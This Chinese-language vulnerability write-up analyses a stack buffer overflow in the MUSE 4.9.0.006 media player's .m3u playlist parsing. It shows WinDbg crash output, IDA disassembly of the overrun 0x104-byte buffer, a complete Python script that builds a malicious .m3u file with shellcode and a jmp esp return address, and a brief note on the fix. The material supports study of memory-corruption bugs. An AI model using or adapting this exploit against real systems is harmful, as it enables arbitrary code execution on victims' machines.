且编写我们的利用程序, 到最后, 会简单讲一下, 这个漏洞的修补. 首先我们来了解下溢出产生的原因. 打开 windbg, 附加到 msue 进程上, 然后在 kernel!readfile 处下断点, 再用 muse 打开我们之前做好的 test.m3u( 注 : 在这个过程中, 会多次断在 Re

MUSE v4.9.0.006 (.m3u) 本地溢出漏洞的分析和利用 文 : 冰雪风谷文件格式溢出漏洞一直是黑客门攻击的热点, 从暴风影音播放器到 qq 播放器以及其它的各种播放器, 都被人暴过相关的漏洞. 至于造成漏洞的原因, 大部分是由于往栈里拷贝字符的时候, 没有检查字符串的长度, 导致拷贝的长度大于缓冲区的长度, 于是造成了溢出. 当然, 还有部分是整数溢出, 出现在一些有无符号数混合使用, 然后一起做运算的过程中. 最近在 www.exploit-db.com 上, 看到 Glafkos Charalamb. 这位大牛连续放出好几个播放器的文件溢出漏洞, 今天正好有时间, 就拿过来看看, 也顺便总结下, 该类漏洞从 fuzz 到最后修补的一般过程. 我们先从 http://download.cnet.com/muse/3000-2140_4-42511.htm 上下到存在漏洞的版本号为 4.9.0.006 的 MUSE. 安装好后. 我们开始测试, 本机环境为 windows xp sp3 中文版, 至于 http://www.exploit-db.com/exploits/14663/ 上面提供的 poc, 由于其试验环境为 windows xp sp3 en, 我们仅作为参考. 首先我们准备超长字符串的文件, 来 fuzz 这个溢出漏洞. 我们将 300 个 A 写入文件, 保存为 test.m3u. 打开 muse, 加载这个文件. 此时, 我们发现了如下图的报错. 我们可以肯定, 这个溢出存在的, 并且是可以利用的. 由上图可以看到, 程序被成功溢出, eip 现在指向了 0x41414141 这个地址, 由于这个地 址是不可执行的, 所以异常出错. 接下来, 我们要做的就要去分析这个漏洞产生的原因, 并

且编写我们的利用程序, 到最后, 会简单讲一下, 这个漏洞的修补. 首先我们来了解下溢出产生的原因. 打开 windbg, 附加到 msue 进程上, 然后在 kernel!readfile 处下断点, 再用 muse 打开我们之前做好的 test.m3u( 注 : 在这个过程中, 会多次断在 ReadFile 处, 我们要按多次 g), 在我们多次按 g 后, 它停了下来, 显示如下信息, 0:000> g (294.ad0): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=00000000 ecx=00000000 edx=00000130 esi=ffffffff edi=0013f1c1 eip=41414141 esp=0013ef28 ebp=014ab730 iopl=0 nv up ei pl nz ac po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010212 <Unloaded_6.so>+0x41414140: 41414141????? 访问异常了, 此时我们看下栈, 0:000> kv ChildEBP RetAddr Args to Child WARNING: Frame IP not in any known module. Following frames may be wrong. 0013ef24 41414141 41414141 41414141 41414141 <Unloaded_6.so>+0x41414140 *** WARNING: Unable to verify checksum for D:\Program Files\Muse\Muse.exe *** ERROR: Symbol file could not be found. Defaulted to export symbols for D:\Program Files\Muse\Muse.exe - 0013ef5c 0049a8d2 0013f090 00000000 0147c301 <Unloaded_6.so>+0x41414140 0013ef60 0013f090 00000000 0147c301 00000000 Muse!CSdll::operator=+0x99082 0013ef64 00000000 0147c301 00000000 01479308 <Unloaded_6.so>+0x13f08f 我们看到, 在 0x0049a8d2 的前一指命处发生溢出. 我们用 IDA 打开 muse.exe, 看下 0x0049a8d2 之前一指令到底是什么. 我们看到如下指令.text:0049A631 push edi ; File.text:0049A632 lea eax, [esp+338h+buf].text:0049a636 push 104h ;.text:0049a63b push eax ;.text:0049a63c call ds:fgets // 读取长度为 104h 字节.text:0049A8C8 push 0.text:0049A8CA push ecx /* 这个 ecx 是一个字符串的地址, 这个字符串由文件的路径加文件内容组成,

而后面造成溢出的, 也就是对这个的处理造成的溢出, 此时, 我们也看到, 缓冲区 中,A 的数目只有 104h 个字节. */.text:0049a8cb mov ecx, eax.text:0049a8cd call sub_47ba90 // 可以看出, 是在这里发生的 crash, 我们跟进去..text:0049A8D2 jmp short loc_49a8d6 我们跟进 sub_47ba90 中去, 在 sub_47ba90 中, muse.0047ba90.text:0047bbd4 lea edx, [esp+38h+var_1c].text:0047bbd8 mov ecx, ebp.text:0047bbda push edx.text:0047bbdb mov byte ptr [esp+3ch+var_4], 9.text:0047BBE0 call sub_47bdd0 // 在调用这里的时候发生异常, 在 sub_47bdd0 处发生异常, 我们跟进这个函数中去,.text:0047BDD0 sub_47bdd0 proc near ; CODE XREF: sub_47ba90+150p.text:0047bdd0.text:0047bdd0 var_104 = byte ptr -104h.text:0047BDD0 arg_0 = dword ptr 4.text:0047BDD0.text:0047BDD0 mov eax, [esp+arg_0] //.text:0047bdd4 sub esp, 104h // 分配 0x104 的栈的大小, 这里分配 0x104 栈的大小, 是因为, 前面读的时候, 只从文件 中读取了 0x104 个字节, 作者认为, 在这里也分配 0x104 就够了. 其实不然..text:0047BDDA xor edx, edx.text:0047bddc push ebx.text:0047bddd push ebp

.text:0047bdde push esi.text:0047bddf push edi.text:0047bde0 mov edi, [eax+4] // 取得路径.text:0047BDE3 mov ebp, ecx.text:0047bde5 cmp edi, edx // 如果路径不为空, 则跳转..text:0047BDE7 jnz short loc_47bdef.text:0047bde9 mov edi, ds:?_c@?1??_nullstr@?$basic_string@du?$char_traits@d@std@@v?$allocator@d@2@@std @@CAPBDXZ@4DB ; char const `std::basic_string<char,std::char_traits<char>,std::allocator<char>>::_nullstr(void)'::`2'::_c.text:0047bdef.text:0047bdef loc_47bdef: ; CODE XREF: sub_47bdd0+17j.text:0047bdef or ecx, 0FFFFFFFFh // 不为空, 跳这里..text:0047BDF2 xor eax, eax.text:0047bdf4 repne scasb.text:0047bdf6 not ecx //ecx 的值,.text:0047BDF8 sub edi, ecx //.text:0047bdfa lea ebx, [esp+114h+var_104].text:0047bdfe mov eax, ecx // 此时 ecx 中为文件路径加文件内容的长度, 而文件内容的长度已经为 104, 再加上路径 的长度, 很明显, 这个值会大于 104..text:0047BE00 mov esi, edi.text:0047be02 mov edi, ebx.text:0047be04 add ebp, 9Ch.text:0047BE0A shr ecx, 2 // 把 ecx 除以 4.text:0047BE0D rep movsd // 把 esi 的内容考贝到 edi 中, 此时, 造成溢出, 覆盖了返回地址. 至此, 溢出产生的原因分析清楚了, 由于作者在处理 m3u 文件的时候, 如果 m3u 文件内 容前面没有路径名或协议名的话, 则会自动加上文件存在的路径, 而此时的路径加文件的长 度, 就大于原来认为的 0x104 了, 所以造成溢出. 接下来, 我们就写可以开始写我们的 poc 了. 我们注意下我们路径的值为 45(0x2d) 所以我们 poc 的长度应该为 108-2d, 为 db(219), 所以我们的 poc 如下 (215)nop+shellcode, (4) eip 这个值要指向我们 shellcode 的地址, 我们这个用 jmp esp 指令, 7dbf23a8(jmp esp in shell32.dll)( 这是我本机上的地址, 大家可以替换 ) (x) 后面再加 nop+ jmp esp-x, 指令, 跳到我们的 shellcode 上, 就可以了. ( 总之, 215+4+x < 260(104h)). 根据上述的结构, 我们写好如下 poc( 仅供参考, 因为, 这个 poc 的利用与那个路径的值

有关系, 所以, 换个路径不一定有用, 同时, 说明这个漏洞的利用也有一定的局限性 ) buffersize = 215 nopsled = "\x90" * 4 shellcode = ( "\x2b\xe2" "\x31\xc0\x31\xdb\x31\xc9\x31\xd2" "\x51\x68\x6c\x6c\x20\x20\x68\x33" "\x32\x2e\x64\x68\x75\x73\x65\x72" "\x89\xe1\xbb\x7b\x1d\x80\x7c\x51" "\xff\xd3\xb9\x5e\x67\x30\xef\x81" "\xc1\x11\x11\x11\x11\x51\x68\x61" "\x67\x65\x42\x68\x4d\x65\x73\x73" "\x89\xe1\x51\x50\xbb\x40\xae\x80" "\x7c\xff\xd3\x89\xe1\x31\xd2\x52" "\x51\x51\x52\xff\xd0\x31\xc0\x50" "\xb8\x12\xcb\x81\x7c\xff\xd0") #shellcode = ("\xeb\x16\x5b\x50\x88\x43\x09\x53" # "\xbb\x0d\x25\x86\x7c" # "\xff\xd3\x31\xc0" # "\xbb\x12\xcb\x81\x7c" # "\xff\xd3\xe8\xe5\xff\xff\xff" # "\x63\x61\x6c\x63\x2e" # "\x65\x78\x65") junk = "\x90" * (buffersize-(len(nopsled)+len(shellcode))) njump = "\xe9\x1c\xff\xff\xff" #jmp 0x00 eip = "\xa8\x23\xbf\x7d" # jmp esp in shell32.dll payload = nopsled+shellcode+junk + eip + nopsled + njump try: print "[+] Creating exploit file.." exploit = open('test.m3u','w'); exploit.write(payload); exploit.close(); print "[+] Writing", len(payload), "bytes to test.m3u" print "[+] Exploit file created!" except: print "[-] Error: You do not have correct permissions.." 利用上述提供的 python 代码生成 test.m3u 后, 我们执行, 可以看到如下结果

( 注 : 在这里, 如果把 shellcode 换成别的 shellcode 的时候, 也许会出错, 因为在执行到 shellcode 的时候, 当前的 esp 指向了 shellcode 中, 执行 shellcode 中的函数譬如 Loadlibrary 的时候, 便把栈内的 shellcode 给覆盖了, 所以导致报错, 执行失败. 所以看上面的例子, 在 shellcode 前面加了两个字节 \x2b\xe2, 它的汇编指令是 sub esp, edx, 因为注意到执行到 shellcode 的时候, edx 的值为 111h, 这样一减, 就把当前栈指向别处去了, 这样, 执行 shellcode 的时候, 不会破坏 shellcode 的内容. 当然这里, 你们也可以自由发挥, 但要注意的是, 在 shellcode 中不能存在 \x00 的, 所以, 如果想在其中加一些指令的话, 要对其进行编码, 或想办法用其它指令代替, 这不是这篇文章的重点, 就不在这里细说了 ) 最后讲下如何修补漏洞, 很简单, 在往缓冲区拷贝的时候, 判断一下拷贝字符串的大小, 是否小于我们分配的栈的大小即可. 上面的这个漏洞就分析到这里, 大家有什么不明白的, 可以到黑防论坛与我交流, 我的黑防 ID 是冰雪风谷. ( 另补充一点, 大家在测试的时候, 一定要注意, 文件的路径应该为 C:\Documents and Settings\h\ 桌面 \MUSE. 这个不是绝对的, 但长度应该一样. 或者可以根据自己本机的情况, 算出相关的值. )